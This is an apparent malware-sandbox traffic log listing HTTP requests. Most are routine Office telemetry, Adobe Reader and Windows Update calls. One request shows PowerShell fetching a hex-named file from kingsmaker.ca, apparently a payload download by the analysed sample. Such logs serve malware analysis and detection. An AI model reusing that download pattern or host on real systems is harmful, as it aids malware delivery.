        Source: global trafficHTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /psdk/v2/content?surfaceId=ACROBAT_READER_MASTER_SURFACEID&surfaceId=DC_READER_LAUNCH_CARD&surfaceId=DC_Reader_RHP_Banner&surfaceId=DC_Reader_RHP_Retention&surfaceId=Edit_InApp_Aug2020&surfaceId=DC_FirstMile_Right_Sec_Surface&surfaceId=DC_Reader_Upsell_Cards&surfaceId=DC_FirstMile_Home_View_Surface&surfaceId=DC_Reader_RHP_Intent_Banner&surfaceId=DC_Reader_Disc_LHP_Banner&surfaceId=DC_Reader_Edit_LHP_Banner&surfaceId=DC_Reader_Convert_LHP_Banner&surfaceId=DC_Reader_Sign_LHP_Banner&surfaceId=DC_Reader_More_LHP_Banner&surfaceId=DC_Reader_Disc_LHP_Retention&surfaceId=DC_Reader_Home_LHP_Trial_Banner&adcProductLanguage=en-us&adcVersion=23.6.20320&adcProductType=SingleClientMini&adcOSType=WIN&adcCountryCode=US&adcXAPIClientID=api_reader_desktop_win_23.6.20320&encodingScheme=BASE_64 HTTP/1.1Host: p13n.adobe.ioConnection: keep-alivesec-ch-ua: "Chromium";v="105"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.6.20320 Chrome/105.0.0.0 Safari/537.36Accept: application/json, text/javascript, */*; q=0.01x-adobe-uuid: 89d789c4-e7e5-4f75-95a4-57139ab6811fx-adobe-uuid-type: visitorIdx-api-key: AdobeReader9sec-ch-ua-platform: "Windows"Origin: https://rna-resource.acrobat.comAccept-Language: en-US,en;q=0.9Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://rna-resource.acrobat.com/Accept-Encoding: gzip, deflate, br
        Source: global trafficHTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /onboarding/smskillreader.txt HTTP/1.1Host: armmf.adobe.comConnection: keep-aliveAccept-Language: en-US,en;q=0.9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.6.20320 Chrome/105.0.0.0 Safari/537.36Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brIf-None-Match: "78-5faa31cce96da"If-Modified-Since: Mon, 01 May 2023 15:02:33 GMT
        Source: global trafficHTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /file2/30bb492ec87899a2b4a8fa5c9eeec46957553fd4ccfb234669d52f6f2a278556703b98ace61ec66f52d29b28a8a4a890956d54d1d9e24579c740190b8799b1b67a5f4a6dff13c00dd57d89558c4a1e3705f0cd3f182dd3fb5270007203188fb6 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: kingsmaker.ca
        Source: global trafficHTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=txFb4ztSLLEgxVe&MD=N4lU5e1w HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
        Source: global trafficHTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
